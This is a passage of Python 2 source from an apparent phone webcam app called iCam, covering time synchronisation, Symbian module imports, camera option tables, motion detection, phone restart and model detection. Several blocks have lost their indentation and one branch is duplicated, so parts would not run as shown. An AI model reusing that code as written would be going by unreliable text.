    DebugPrint("Entered TimeSyncNTP(): ntplib = %s." % str(ntplib))
    # Fixed idiom: identity comparison with None (was "== None").
    if ntplib is None:
        return
    # Inspired from http://stackoverflow.com/questions/5222951/easy-way-to-get-the-correct-time-in-python
    try:
        client = ntplib.NTPClient()
        # response.tx_time is a float: seconds since the beginning of the
        # Unix era.
        #response = client.request("pool.ntp.org")
        response = client.request("europe.pool.ntp.org", version=3)
        #!!!!TODO: We should execute even faster the time setting - not sending string command to be parsed by ExecuteCommands()...;
        #!!!!TODO: therefore make separate function SetDateTime() and call it directly and make ExecuteCommands() also call it.
        ExecuteCommands("set-date-and-time %.3f" % response.tx_time, \
                        fastExec=True)
        crtTime = GetTime()
        DebugPrint("TimeSyncNTP(): response.tx_time = %s, crtTime = %s" % \
                    (str(response.tx_time), str(crtTime)))
        if False:
            # Disabled: would relay the fresh time to the BT clients.
            BluetoothTimeSync()
    except:
        DebugPrint("TimeSyncNTP(): Could not sync with time server.")
        DebugPrintErrorTrace()
# Manual correction (in seconds) added on top of the time received from the
# iCam server before setting the clock; 0 means trust the server time as-is.
# (The commented 3600 was presumably a one-hour correction - verify.)
TIME_DIFFERENCE_BETWEEN_LOCAL_AND_ICAM_SERVER = 0 #3600 #0 # [seconds]
def TimeSyncWithiCamServer():
    """
    !!!!TODO: we currently don't use mobile-revival.110mb.com because it's time
        is not that reliable (+-5 min difference).

    Fetch the current time from the iCam web server (GetTime.php, zlib
    compressed) and set the device clock from it.

    NOTE: currently DISABLED - see the early return below; everything after
    it is dead code kept for when a reliable time server is available.
    """
    # NOTE(review): deliberate disable; nothing below executes.
    return
    DebugPrint("Entered TimeSyncWithiCamServer().")
    #"""
    # Skip the network round-trip while the access point is in retry mode.
    if accessPointRetryConnect:
        return
    #!!!!TODO: use a serious time server like time....com (or maybe NTP)
    #!!!!TODO: measure and account for the time passed during urlopen()
    # Get time from the iCam server
    try:
        # Look for Python runtime for Symbian, Android, etc!!!!
        iCamTimeCompressed = urllib.urlopen("http://" +
                                ICAM_SERVER_NAME + WEB_FOLDER +
                                "/GetTime.php").read()
        iCamTime = iCamTimeCompressed.decode("zlib")
    except:
        DebugPrintErrorTrace()
        return
    #"""
    #iCamTime = "13:00:00 28-06-2013"
    try:
        # We do not run this code, because on SYMBIAN_OS mktime() doesn't work
        if False:
            tokens = iCamTime.split(" ")
            tok2 = tokens[1].split("-")
            #(tm_year, tm_mon, tm_mday) = tok2
            tm_year = int(tok2[0])
            tm_mon = int(tok2[1])
            tm_mday = int(tok2[2])
            tok2 = tokens[0].split(":")
            tm_hour = int(tok2[0])
            tm_min = int(tok2[1])
            tm_sec = int(tok2[2])
            timeReceived = (tm_year, tm_mon, tm_mday, tm_hour, tm_min, tm_sec, \
                            -1, -1, -1)
            # These last 3 parameters are tm_wday, tm_yday, tm_isdst
            #print "timeReceived =", timeReceived
            targetTime = time.mktime(timeReceived)
            #targetTime = GetTime()
        # Active path: the server is expected to return a plain epoch integer.
        if True:
            targetTime = int(iCamTime)
        DebugPrint("TimeSyncWithiCamServer(): Received from iCam server " \
                    "targetTime = %s." % str(targetTime))
        targetTime += TIME_DIFFERENCE_BETWEEN_LOCAL_AND_ICAM_SERVER
        ExecuteCommands("set-date-and-time " + str(targetTime))
    except:
        DebugPrintErrorTrace()
    #return
###############################################################################
###############################################################################
###############################END TIME SYNC###################################
###############################################################################
###############################################################################
import httplib
"""
# Need to include it in lib(_std).zip, since it is not a standard library.
try:
import httplib2
import urllib3
except:
DebugPrintErrorTrace()
"""
import urllib
# Platform-conditional imports of the Symbian phone APIs.
sysagentImported = False
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
    try:
        import sysagent
        sysagentImported = True
    except:
        DebugPrint("Not able to import the sysagent module.")
        DebugPrintErrorTrace()
    import telephone
    import graphics
    # from key_codes import *
    import audio
    import location
    import positioning
elif SYMBIAN_UIQ_OS:
    # NOTE(review): this UIQ branch places a REAL phone call (17 s) as a
    # side effect of module import - presumably leftover test code; confirm.
    try:
        print "Now we give import telephone."
        import telephone
        print "Calling at %s." % time.asctime(GetCurrentDateTime())
        sys.stdout.flush()
        telephone.dial(u"0770000000")
        e32.ao_sleep(17)
        telephone.hang_up()
        e32.ao_sleep(2)
    except:
        DebugPrintErrorTrace()
    # import comdef
if SYMBIAN_OS:
    try:
        # pyS60VersionNumber are the first 2 digits of PyS60's version
        pyS60VersionNumber = e32.pys60_version_info[0] * 10 + \
                                e32.pys60_version_info[1]
        if pyS60VersionNumber <= 14:
            # (1, 4, 5, 'final', 0)
            _PyS60_1_9_OR_NEWER = False
        elif pyS60VersionNumber >= 19:
            # (2, 0, 0, 'svn3873', 0)
            _PyS60_1_9_OR_NEWER = True
        # NOTE(review): versions 15..18 set neither branch - presumably
        # _PyS60_1_9_OR_NEWER is defined earlier in the file; verify.
    except:
        DebugPrintErrorTrace()
    if not _PyS60_1_9_OR_NEWER:
        """
        On Python 2.2 we cannot use zip packages for module imports, so we
            replace the "lib_std.zip" with a folder with the
            uncompressed content.
        """
        sys.path[0] = os.path.join(os.getcwd(), "site-packages")
        DebugPrint("sys.path (updated) = %s" % str(sys.path))
###############################################################################
###############################################################################
##########################BEGIN S60 CAMERA MODULE IMPORT#######################
###############################################################################
###############################################################################
"""
IMPORTANT NOTE: The import of a module inside a function is visible ONLY
inside the function - TODO!! - but we can declare as global camera, _camera2, etc.
#def ImportCameraModule():
"""
# """
camera2IsImported = False
# if SYMBIAN_OS and SYMBIAN_S60_OS:
if SYMBIAN_S60_OS:
if _PyS60_1_9_OR_NEWER:
if deviceId == IMEI_G810: # Was this really for G810, or was it different? I think I was just testing if loading the .pyd gave errors, which it was...
"""
NOTE: Samsung G810 requires a different initialization in camera(2).py than
for Nokia S60 phones - DOCUMENT BETTER!!!!TODO!!!!!!!! - see 2do_iCam_Samsung_G810.txt:
" the iCam was crashing at camera operations because iCam is creating more instances (for device for image_size(); for VGA camera besides Main camera) and this generates errors in ReserveComplete
for example 2 GeneralUseCameraS60(cameraId), without release?? crashes iCam".
Also, it doesn't work video recording.
IMPORTANT: It seems imp.load_dynamic() crashes PyS60 1.4.5
without exception.
"""
try:
import imp
# Gives exception "ImportError: dlopen: Load failed"
#_camera2 = imp.load_dynamic("_camera2",
# "kf__camera2_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
#_camera2 = imp.load_dynamic("_camera2",
# r"E:\sys\bin\kf__camera2_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
# _camera2 = imp.load_dynamic("_camera2",
# r"E:\sys\bin\251__camera2.pyd")
# Works
# _camera2 = imp.load_dynamic("_camera", "251__camera.pyd")
# Gives exception "ImportError: dlopen: Load failed"
# _camera2 = imp.load_dynamic("_camera", "kf__camera_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
#_camera2 = imp.load_dynamic("sysagent",
# "kf_sysagent_e21e55ef.pyd")
# Not tried
# _camera2 = imp.load_dynamic("pyinbox", "kf_pyinbox_e21e55ef.pyd")
# _camera2 = imp.load_dynamic("camera", "kf__camera_e21e55ef.pyd")
# Gives exception "ImportError: dlopen: Load failed"
_camera2 = imp.load_dynamic("_camera2", "kf__camera2_e21e55ef.pyd")
DebugPrint("Imported the _camera2.pyd module: _camera2 = %s." % \
str(_camera2))
except ImportError:
DebugPrint("Not able to load_dynamic the _camera2.pyd module.")
DebugPrintErrorTrace()
try:
import camera2 as camera
# import camera2
camera2IsImported = True
DebugPrint("Imported the camera2 module.")
except ImportError:
DebugPrint("Not able to import the camera2 module.")
DebugPrintErrorTrace()
# """
try:
import camera
except:
# except ImportError:
DebugPrint("Not able to import the camera module.")
DebugPrintErrorTrace()
# For PyS60 1.4.5
else:
try:
import camera
except:
# except ImportError:
DebugPrint("Not able to import the camera module.")
DebugPrintErrorTrace()
###############################################################################
###############################################################################
###########################END S60 CAMERA MODULE IMPORT########################
###############################################################################
###############################################################################
if SYMBIAN_S60_OS:
sensorsAvailable = ""
try:
import sensor
# sensorsAvailable = sensor.list_channels()
sensorsAvailable = sensor.sensors()
"""
Both N95, PyS60 1.4.5 and 2.0 and N82, PyS60 2.0 give
sensorsAvailable = {u'RotSensor': {'category': 321, 'id': 12350},
u'AccSensor': {'category': 268505087, 'id': 271003684}}
From http://wiki.forum.nokia.com/index.php/S60_Sensor_Framework
"Note that the old sensor API plug-ins are not compatible with
the S60 Sensor Framework. In addition, applications created with
Sensor FW do not work in S60 3rd Edition, FP1 devices other than
the Nokia E66 mobile device. If you wish to provide just one
installation file, you can pack the sensor API parts into an ECom
plug-in, build one file with the S60 5th Edition SDK and another
with the S60 3rd Edition MR SDK, and then load the correct one
during runtime."
"""
except:
DebugPrint("Not able to import the sensor module.")
DebugPrintErrorTrace()
# Not available on PyS60 1.4.5 which uses Py 2.2.2 - available from Py 2.3.
# import datetime
try:
import pyinbox
except:
DebugPrint("Not able to import the pyinbox module.")
DebugPrintErrorTrace()
try:
import socket
except:
DebugPrint("Not able to import the socket module.")
DebugPrintErrorTrace()
"""
To have socket timeout on PyS60 1.4.5 see for ex
http://discussion.forum.nokia.com/forum/showthread.php?72774-socket-timeout
Use maybe Tsocket extension - see also
http://discussion.forum.nokia.com/forum/showthread.php?109520-announce-tsocket-socket-module-timeout-on-connect.
Note: at least at the first Internet access, iCam running at least on Nokia E7
seems to wait somewhat longer than the specified SOCKET_DEFAULT_TIMEOUT
(so SOCKET_DEFAULT_TIMEOUT doesn't seem to be a hard deadline).
"""
# Default timeout (seconds) applied to all new sockets; note this is not a
# hard deadline on every platform (see commentary above re: Nokia E7).
SOCKET_DEFAULT_TIMEOUT = 20.0
# SOCKET_DEFAULT_TIMEOUT = 10.0
# Gives many timeouts, at least when the server was down:
# socket.setdefaulttimeout(5.0)
try:
    # Inspired from https://groups.google.com/group/comp.lang.python/browse_thread/thread/ff84e7340988c168/
    # socket.setdefaulttimeout(5.0)
    """
    From http://docs.python.org/library/socket.html#socket.setdefaulttimeout:
        "A value of None indicates that new socket objects have no timeout.
        When the socket module is first imported, the default is None."
    Also note that on Windows it seems that the default timeout is
        20-30 seconds.
    """
    socket.setdefaulttimeout(SOCKET_DEFAULT_TIMEOUT)
except:
    DebugPrint("Not able to use socket.setdefaulttimeout() - maybe because " \
                "running on PyS60 1.4.5.")
    DebugPrintErrorTrace()
misoIsImported = False
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
if _PyS60_1_9_OR_NEWER:
try:
# Not supported in PyS60 v1.4.5, where it will generate an
# ImportError exception.
import btsocket
except:
DebugPrint("Cannot import module btsocket - maybe because you " \
"are using PyS60 v1.4.5.")
DebugPrintErrorTrace()
else:
# On PyS60 1.4.x, socket contained the BT functionality also.
import socket as btsocket
try:
import miso
misoIsImported = True
except:
DebugPrint("Not able to import the miso module.")
DebugPrintErrorTrace()
try:
import inbox
inboxIsImported = True
except:
inboxIsImported = False
(exceptionTypeG, exceptionValueG, exceptionTracebackG) = sys.exc_info()
myTextGlobal = "Cannot import inbox - details: %s." % \
repr(traceback.format_tb(exceptionTracebackG))
# if MY_DEBUG_UPLOAD_MSG:
# UploadGZippedData(deviceId, myTextGlobal, ICAM_SERVER_NAME,
# WEBPAGE_UL_GZIPPED_TEXT, None)
DebugPrint(myTextGlobal)
DebugPrintErrorTrace()
import messaging
###############################################################################
###############################################################################
###############################################################################
###############################END IMPORTS#####################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
################################STRINGS########################################
###############################################################################
###############################################################################
"""
See http://www.daniweb.com/forums/thread138449.html and
http://bytes.com/topic/python/answers/768072-nameerror-global-name-addbook-not-defined
"""
# pauseIntervalStr = None
# photoResolutionStr = None
# photoModeStr = None
# flashStr = None
# exposureStr = None
# whiteBalanceStr = None
# UI option tables: each entry is [display label, value passed to the
# camera / scheduler code].
# Pause between captures: label -> interval in seconds.
pauseIntervalStr = [
    ["0 sec (Burst mode)", 0],
    ["1 sec", 1],
    ["5 sec", 5],
    ["10 sec", 10],
    ["15 sec", 15],
    ["20 sec", 20],
    ["30 sec", 30],
    ["45 sec", 45],
    ["1 min", 60],
    ["2 min", 120],
    ["3 min", 180],
    ["4 min", 240],
    ["5 min", 300],
    ["7 min", 420],
    ["10 min", 600],
    ["15 min", 900],
    ["20 min", 1200],
    ["30 min", 1800],
    ["45 min", 2700],
    ["50 min", 3000],
    ["1 hr", 3600],
    ["2 hr", 7200],
    ["3 hr", 10800],
    ["4 hr", 14400],
    ["5 hr", 18000],
    ["6 hr", 21600],
    ["10 hr", 36000],
    ["12 hr", 43200],
    ["24 hr", 86400]
]
# Upload resolution: label -> (width, height); (0, 0) disables upload and
# (-1, -1) keeps the locally captured resolution.
photoResolutionStr = [
    ["Do Not Upload Photo", (0, 0)],
    ["Use Local Resolution", (-1, -1)],
    ["40x30", (40, 30)],
    ["80x60", (80, 60)],
    ["160x120", (160, 120)],
    ["240x180", (240, 180)],
    ["320x240", (320, 240)],
    ["400x300", (400, 300)],
    ["512x384", (512, 384)],
    ["640x480", (640, 480)],
    ["1152x864", (1152, 864)],
    ["1280x960", (1280, 960)],
    ["1600x1200", (1600, 1200)],
    ["2048x1536", (2048, 1536)],
    ["2592x1456", (2592, 1456)],
    ["2592x1944", (2592, 1944)],
    ["3264x1832", (3264, 1832)],
    ["3264x2448", (3264, 2448)],
    ["4000x2248", (4000, 2248)],
    ["4000x3000", (4000, 3000)]
]
# Capture pixel format: label -> mode string (camera API values).
photoModeStr = [
    ["RGB12", "RGB12"],
    ["RGB16", "RGB16"],
    ["RGB24", "RGB"],
    ["JPEG_Exif", "JPEG_Exif"],
    ["JPEG_JFIF", "JPEG_JFIF"]
]
# Flash mode: label -> camera API flash value.
flashStr = [
    ["Auto", "auto"],
    ["None", "none"],
    ["Red_eye_reduce", "red_eye_reduce"],
    ["Forced", "forced"],
    ["Fill_in", "fill_in"]
]
# Exposure mode: label -> camera API exposure value.
exposureStr = [
    ["Auto", "auto"],
    ["Center", "center"],
    ["Backlight", "backlight"],
    ["Night", "night"]
]
# White balance: label -> camera API white-balance value.
whiteBalanceStr = [
    ["Auto", "auto"],
    ["Daylight", "daylight"],
    ["Cloudy", "cloudy"],
    ["Tungsten", "tungsten"],
    ["Fluorescent", "fluorescent"],
    ["Flash", "flash"]
]
###############################################################################
###############################################################################
###############################################################################
##############################END STRINGS######################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
###############################################################################
############################MOTION DETECTION###################################
###############################################################################
###############################################################################
# Upper bound on the number of motion-detection hotspot rectangles.
MAX_NUM_HOTSPOTS = 5
# BEFORE_MAIN: For modularity we execute here!!
# Each slot holds [[UL_x, UL_y], [LR_x, LR_y]] as fractions of the frame;
# a fresh rectangle is appended per slot so the slots share no sub-lists.
hotspot = []
for myI in range(MAX_NUM_HOTSPOTS):
    hotspot.append([[0, 0], [0, 0]])
def SetMotionDetectionHotspot(hotspotIndex,
                              percentsUL_X, percentsUL_Y,
                              percentsLR_X, percentsLR_Y):
    """
    Store hotspot rectangle *hotspotIndex* given as percentages of the frame.

    The four percents (upper-left X/Y, lower-right X/Y) are converted to
    fractions in [0, 1] and written in place into the global hotspot table.
    Indices >= MAX_NUM_HOTSPOTS are silently ignored.
    """
    global hotspot, MAX_NUM_HOTSPOTS
    if hotspotIndex >= MAX_NUM_HOTSPOTS:
        return
    rect = hotspot[hotspotIndex]
    rect[0][0] = percentsUL_X / 100.0
    rect[0][1] = percentsUL_Y / 100.0
    rect[1][0] = percentsLR_X / 100.0
    rect[1][1] = percentsLR_Y / 100.0
# BEFORE_MAIN: For modularity we execute here!!
# Hotspot 0 covers the full frame; hotspot 1 a centered sub-rectangle.
# Arguments are PERCENTS of the frame (converted to fractions internally).
SetMotionDetectionHotspot(0, 0.0, 0.0, 100.0, 100.0)
SetMotionDetectionHotspot(1, 50.0, 50.0, 80.0, 80.0)
"""
numHotspots = 1
differentPixelsPercentageThreshold = [5.0]
"""
# numHotspots = 2
# Only the first numHotspots hotspots (and threshold entries) are used by
# DetectMotion().
numHotspots = 1
differentPixelsPercentageThreshold = [5.0, 10.0]
# Sampling grid resolution used when stepping over the frame - presumably
# samples ~40x30 points per frame; see the step computation in DetectMotion().
sizeMotionCheckWindow = (40, 30)
def DetectMotion(aPrevVFFrame, aCrtVFFrame):
    """
    Compare two viewfinder frames and report whether motion was detected.

    For each active hotspot, samples a grid of pixels (stepped so roughly
    sizeMotionCheckWindow points are visited) and counts pixels whose summed
    RGB delta between the frames exceeds a fixed per-pixel threshold.
    Returns True as soon as one hotspot's count exceeds its percentage
    threshold; False otherwise (and False on any exception).
    """
    # See http://wiki.forum.nokia.com/index.php/Motion_detection_with_camera
    global numHotspots, hotspot, differentPixelsPercentageThreshold, \
        sizeMotionCheckWindow
    try:
        # for hotspotIndex in range(0, numHotspots):
        for hotspotIndex in range(numHotspots):
            (crtWidth, crtHeight) = aCrtVFFrame.size
            # Draw a red rectangle.
            #aCrtVFFrame.rectangle([ (hotspot[hotspotIndex][0][0] * crtWidth,
            #    hotspot[hotspotIndex][0][1] * crtHeight),
            #    (hotspot[hotspotIndex][1][0] * (crtWidth - 1),
            #    hotspot[hotspotIndex][1][1] * (crtHeight - 1))], 0xff0000)
            #aCrtVFFrame.rectangle([ (hotspot[hotspotIndex][0][0] * crtWidth,
            #    hotspot[hotspotIndex][0][1] * crtHeight),
            #    (hotspot[hotspotIndex][1][0] * (crtWidth - 1),
            #    hotspot[hotspotIndex][1][1] * (199 - 1))], 0xff0000)
            # Step sizes chosen so ~sizeMotionCheckWindow samples are taken.
            crtStepX = int(crtWidth / sizeMotionCheckWindow[0])
            crtStepY = int(crtHeight / sizeMotionCheckWindow[1])
            #differentPixelsThreshold = crtWidth * crtHeight * \
            #    differentPixelsPercentageThreshold[hotspotIndex] / 100.0
            # Threshold is a percentage of the SAMPLED grid, not of the frame.
            differentPixelsThreshold = sizeMotionCheckWindow[0] * \
                sizeMotionCheckWindow[1] * \
                differentPixelsPercentageThreshold[hotspotIndex] / 100.0
            numDifferentPixels = 0
            for y in range(int(hotspot[hotspotIndex][0][1] *
                    crtHeight), int(hotspot[hotspotIndex][1][1] *
                    (crtHeight - 1)), crtStepY):
                for x in range(int(hotspot[hotspotIndex][0][0] * crtWidth),
                        int(hotspot[hotspotIndex][1][0] *
                        (crtWidth - 1)), crtStepX):
                    # getpixel((x, y))[0] - presumably returns [(r, g, b)];
                    # confirm against the graphics.Image API.
                    (r, g, b) = aCrtVFFrame.getpixel((x, y))[0]
                    (prevr, prevg, prevb) = aPrevVFFrame.getpixel((x, y))[0]
                    # Manhattan distance in RGB space between the frames.
                    delta = abs(r - prevr) + abs(g - prevg) + abs(b - prevb)
                    if delta > 3 * 10: # 3 * 30):
                        numDifferentPixels += 1
                    # Early exit: bail out as soon as the threshold is hit.
                    if numDifferentPixels > differentPixelsThreshold: #40
                        DebugPrint("DetectMotion(): detected motion - " \
                                    "numDifferentPixels = %d > " \
                                    "differentPixelsThreshold = %d." % \
                                    (numDifferentPixels,
                                    int(differentPixelsThreshold)))
                        return True
                    """
                    From http://discussion.forum.nokia.com/forum/showthread.php?114751-Is-there-a-setpixel-for-image-objects
                        (a bit also http://discussion.forum.nokia.com/forum/showthread.php?120004-How-to-access-pixel-array-of-image-captured-by-viewfinder)
                    """
                    #aCrtVFFrame.point( (x, y), newRGB )
            # NOTE(review): printed once per hotspot; would raise NameError
            # if numHotspots were 0 (variables from the loop) - currently
            # numHotspots is 1 so this cannot happen.
            DebugPrint("DetectMotion(): did NOT detect motion - " \
                "numDifferentPixels = %d <= differentPixelsThreshold = %d." % \
                (numDifferentPixels, int(differentPixelsThreshold)))
        """
        # Before it was 160 x 120 ; (1152, 864)
        im = camera.take_photo('RGB', (320,240))
        # Red outline
        im.rectangle([(10,10),(40,40)], 0xff0000)
        # No code for this square
        im.rectangle([(120,10),(150,40)], 0xff0000)
        # Check hot spot whether active
        box = Image.new((30,30), 'L') # gray scale
        box.blit(im, (10,10,40,40))
        data = getdata(box, 8)
        # Check difference for motion
        pixdiff = 0
        for x,y in zip(data, last1):
            # pix threshold 15/256
            if abs(ord(x) - ord(y)) > 15:
                pixdiff += 1
        # img threshold 90/900
        if pixdiff > 90:
            im.rectangle([(10,10),(40,40)], fill=0xff0000) # fill
            # Motion detected
            break
        last1 = data
        # Show camera
        c.blit(im, (0,0), (8,12))
        #miso.reset_inactivity_time()
        """
        return False
    except:
        DebugPrintErrorTrace()
        return False
###############################################################################
###############################################################################
###############################################################################
#########################END MOTION DETECTION##################################
###############################################################################
###############################################################################
def RestartPhone():
    """
    Close the redirected stdout/stderr log files, then restart the device
    using the platform-appropriate mechanism.  Never raises.
    """
    try:
        """
        It seems in Python CE stderrFile.close() (or maybe stdoutFile.close())
            gives exception
            "script.py - 34 <type 'exceptions.IOError'>: [Errno 0] Error" .
        """
        # Flush + close the log files first (skipped on Python CE, see above).
        if WINDOWS_CE_OS_PYTHONCE == False:
            if MY_DEBUG_STDOUT:
                print "Entered RestartPhone()."
                # if deviceId != IMEI_6680:
                sys.stdout.flush()
                stdoutFile.close()
            if MY_DEBUG_STDERR:
                # sys.stderr.flush()
                stderrFile.close()
        if SYMBIAN_OS:
            """
            try:
                # This requires PowerMgmt capabilities:
                miso.restart_phone()
            except:
                DebugPrintErrorTrace()
            # In case miso.restart_phone() doesn't work (either because miso
            #   library is not loaded, or because we don't have capabilities),
            #   use the alternative solution to restart phone.
            """
            # Launching starter.exe restarts the phone without needing
            # PowerMgmt capabilities.
            if S60_EDITION[0] >= 3:
                # This is for S60 3rd+ edition.
                e32.start_exe(u"z:\\sys\\bin\\starter.exe", "")
            else:
                """
                See http://discussion.forum.nokia.com/forum/showthread.php?108606-Reboot-device&ticket=ST-25966-eybpBkRcw9c1vkmQnQyzjYZSb6pEUFWftwA-20:
                    Works on S60 2nd edition (e.g., Nokia 6680).
                """
                e32.start_exe(u"Z:\\System\\Programs\\Starter.exe", "")
        elif ANDROID_OS:
            # Not implemented on Android.
            pass
        elif iOS_PYOBJC:
            # Restarts the springboard.
            subprocess.call(["/usr/bin/restart"])
            #, stdout=fOutput, stderr=None)
        elif WINDOWS_OS:
            # Reboots
            # /sbin/reboot
            # pass
            # Not implemented on Windows.
            pass
        elif WINDOWS_CE_OS_PYTHONCE:
            # WinSpawn(r"\Storage Card\iCam\Restart.exe", [])
            tmpPathFileName = LOCAL_FOLDER + "/Restart.exe"
            # I think we require backslashes
            tmpPathFileNameWithBackslashes = tmpPathFileName.replace("/", "\\")
            WinSpawn(tmpPathFileNameWithBackslashes, [])
    except:
        DebugPrintErrorTrace()
###############################################################################
###############################################################################
###############More info about firmware types: ################################
##########Z:\1PhD\ReVival\1111PyS60_extensions\cyke642\firmware.py#############
###############################################################################
###############################################################################
def GetPhoneModel():
DebugPrint("Entered GetPhoneModel().")
# if SYMBIAN_OS:
if SYMBIAN_S60_OS:
"""
Nokia6680 : sw_version = V 5.04.07 15-02-06 RM-36 (c) NOKIA
NokiaN95 : sw_version = V 30.0.015 15-07-08 RM-159 N95(c)NMP
NokiaN95 2: sw_version = V 35.0.002 18-11-09 RM-159 N95(c)NMP.
os_version = (2, 0, 1540). S60 version info = (3, 1).
Nokia6120 : sw_version = V 06.01 02-09-08 RM-243
NokiaN82 : (from *#0000#) V 31.0.016 09-12-08 RM-313 Nokia N82 (01.01)
NokiaC5 : sw_version = 031.022 28-Mar-2010 RM-645 (C)Nokia
"""
try:
"""
This gives error (I guess) if you don't have the right
capabilities - ReadUserData??
"""
swVersion = sysinfo.sw_version()
except:
DebugPrintErrorTrace()
if swVersion.find("RM-36") != -1:
modelName = "Nokia6680"
elif swVersion.find("RM-84") != -1:
modelName = "NokiaN70"
elif swVersion.find("RM-159") != -1:
modelName = "NokiaN95"
elif swVersion.find("RM-170") != -1:
modelName = "NokiaE50-1"
elif swVersion.find("RM-208") != -1:
modelName = "NokiaE65"
elif swVersion.find("RM-243") != -1:
modelName = "Nokia6120"
elif swVersion.find("RM-313") != -1:
modelName = "NokiaN82"
elif swVersion.find("RM-343") != -1:
modelName = "NokiaE66"
elif swVersion.find("RM-356") != -1 or swVersion.find("RM-428") != -1:
modelName = "Nokia5800"
elif swVersion.find("RM-412") != -1:
modelName = "NokiaE75"
elif swVersion.find("RM-437") != -1:
modelName = "NokiaE63"
elif swVersion.find("RM-504") != -1:
modelName = "Nokia5530"
elif swVersion.find("RM-505") != -1 or swVersion.find("RM-507") != -1:
modelName = "NokiaN97"
elif swVersion.find("RM-530") != -1:
modelName = "NokiaE72"
elif swVersion.find("RM-555") != -1:
modelName = "NokiaN97mini"
elif swVersion.find("RM-559") != -1:
modelName = "NokiaX6"
elif swVersion.find("RM-588") != -1 or swVersion.find("RM-594") != -1:
modelName = "Nokia5230"
elif swVersion.find("RM-596") != -1:
modelName = "NokiaN8"
elif swVersion.find("RM-612") != -1 or swVersion.find("RM-624") != -1:
modelName = "NokiaC6"
elif swVersion.find("RM-626") != -1:
modelName = "NokiaE7"
elif swVersion.find("RM-632") != -1:
modelName = "NokiaE5"
elif swVersion.find("RM-645") != -1:
modelName = "NokiaC5"
elif swVersion.find("RM-675") != -1:
modelName = "NokiaC7"
elif swVersion.find("RM-697") != -1 or swVersion.find("RM-719") != -1:
modelName = "NokiaC5-03"
elif swVersion.find("RM-697") != -1 or swVersion.find("RM-719") != -1:
modelName = "NokiaC5-03"
elif swVersion.find("SGH-G810") != -1:
# G810XDIB1 2009-02-11 SGH-G810 (c)Samsung
modelName = "SamsungSGH-G810"
else:
modelName = ""
modelFileName = "Z:/resource/versions/model.txt"
try:
if os.path.isfile(modelFileName):
"""
#Test if modelFileName exists.
fInput = open(modelFileName, "rb")
fInput.close()
"""
"""
#"This file exist only on 3rd ed onwards"
# (http://discussion.forum.nokia.com/forum/showthread.php?t=100115)
fInput = open("Z:/resource/versions/model.txt", "rb")
#fInput = open("Z:/resource/versions/model.txt", "r")
res = fInput.read()
fInput.close()
DebugPrint(res)
resF = res[2:].encode('ascii', 'ignore')
DebugPrint(resF)
"""
import codecs
# We use "utf-16" encoding:
fInput = codecs.open(modelFileName, "r", "utf-16")
for myLine in fInput:
# print str(line)
modelName = str(myLine)
if modelName.startswith("Nokia 6120"):
modelName = "Nokia6120"
elif modelName.startswith("Nokia 6680"):
modelName = "Nokia6680"
except:
modelName = "ModelUnknown"
DebugPrintErrorTrace()
elif SYMBIAN_UIQ_OS:
#import unicodedata
#unicodedata.normalize("NFKD", title).encode("ascii", "ignore")
#import shutil
#shutil.copy2("Z:/resource/versions/model.txt", "E:/model.txt")
modelName = "UIQ-model"
elif ANDROID_OS:
# myDroid.makeToast(myDroid.getPhoneType().result)
modelName = str(myDroid.getPhoneType().result)
elif iOS_PYOBJC:
modelName = "iPhone-model"
elif WINDOWS_OS:
modelName = "WindowsPC"
elif WINDOWS_CE_OS_PYTHONCE:
modelName = "WindowsMobile"
elif UNIX_OS:
modelName = "LinuxPC"
elif RASPBIAN_OS:
modelName = "Raspberry " #!!!!TODO: use GPIO to get the rev model of RPi
"""
From http://raspi.tv/2014/rpi-gpio-quick-reference-updated-for-raspberry-pi-b
(see also http://raspi.tv/2013/rpi-gpio-basics-2-how-to-check-what-pi-board-revision-you-have )
# What Raspberry Pi revision are we running?
# 0 = Compute Module, 1 = Rev 1, 2 = Rev 2, 3 = Model B+
"""
#print "GPIO.RPI_REVISION = %s" % str(GPIO.RPI_REVISION)
import RPi.GPIO as GPIO
if GPIO.RPI_REVISION == 3:
modelName += "model B+"
elif GPIO.RPI_REVISION == 2:
modelName += "model B"
return modelName
def GetCurrentDateTimeStringWithMilliseconds():
    """
    Return the current local date/time formatted as
    "YYYY_MM_DD_HH_MM_SS_mmm" (mmm = zero-padded milliseconds).

    GetCurrentDateTime() supplies the (possibly device-adjusted)
    struct_time; GetTime() is queried only to derive the fractional
    second, since struct_time carries no sub-second resolution.
    """
    timeStruct = GetCurrentDateTime()
    secondsNow = GetTime()
    # Fractional part of the epoch seconds, scaled to milliseconds.
    millis = (secondsNow - int(secondsNow)) * 1000
    stamp = time.strftime("%Y_%m_%d_%H_%M_%S", timeStruct)
    return stamp + ("_%03d" % millis)
def GetCurrentDateTimeStringNice():
    """
    Return the current local date/time as a human-readable string in
    "HH:MM:SS DD-MM-YYYY" format, based on GetCurrentDateTime().
    """
    niceStamp = time.strftime("%H:%M:%S %d-%m-%Y", GetCurrentDateTime())
    return niceStamp
def isNaN(x):
    """
    Return True iff x is a float NaN.

    Relies on the IEEE-754 property that NaN is the only value that
    compares unequal to itself; non-float inputs are never NaN here.
    """
    if type(x) is not float:
        return False
    return x != x
def isFinite(x):
    """
    Return True iff x is a finite value.

    Bug fix: the original test (x != Infinity) wrongly reported
    -Infinity and NaN as finite.  We now reject both signs of infinity
    and NaN.  Infinity is a module-level constant (presumably
    float("inf") -- TODO confirm against its definition).
    """
    if isNaN(x):
        return False
    return (x != Infinity) and (x != -Infinity)
def GetGSMLocation():
    """
    Refresh the GSM cell-location globals: mobileCountryCode,
    mobileNetworkCode, locationAreaCode, cellId.

    No return value -- results are stored only in the four globals.
    On platforms without a usable cell API all four are set to -1.
    NOTE(review): there is no UNIX_OS / RASPBIAN_OS branch, so on those
    platforms the globals are left untouched.
    """
    global mobileCountryCode, mobileNetworkCode, locationAreaCode, cellId
    # if SYMBIAN_OS:
    if SYMBIAN_S60_OS:
        try:
            gsmLocation = location.gsm_location()
            """
            From PyS60 documentation: "Note: Location module requires
            capabilities ReadDeviceData, ReadUserData and Location."
            See http://discussion.forum.nokia.com/forum/showthread.php?117964-gsm_location%28%29-None-Issue
            for issue with Open signing for Location capability and
            returning non-Null value:
            "gsm_location() function ! gsm_location need caps Location
            and self-signed cert has not this capability !"
